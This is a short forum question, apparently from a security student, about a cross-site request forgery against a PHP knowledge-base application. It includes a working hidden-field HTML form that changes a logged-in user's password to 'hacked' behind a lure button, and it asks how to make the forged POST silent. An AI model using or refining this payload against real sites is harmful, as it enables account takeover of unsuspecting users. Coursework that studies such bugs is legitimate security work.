I am taking a network security class, and one of our assignments is to find security bugs in open source projects.

This one project that I am working seems susceptible to a CSRF. I constructed the following attack, where I trick the user to click a link containing the following:

<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form> 

This attack works and changes the password of the site when the user is currently logged into the site.. however, the result of the page gets rendered to the end user. I tried various methods to "quietly" POST the form (PHP based methods and JS based methods) with no avail.

Can anyone provide some guidance and perhaps point me in the right direction as to whether it’s possible to silently POST to another website?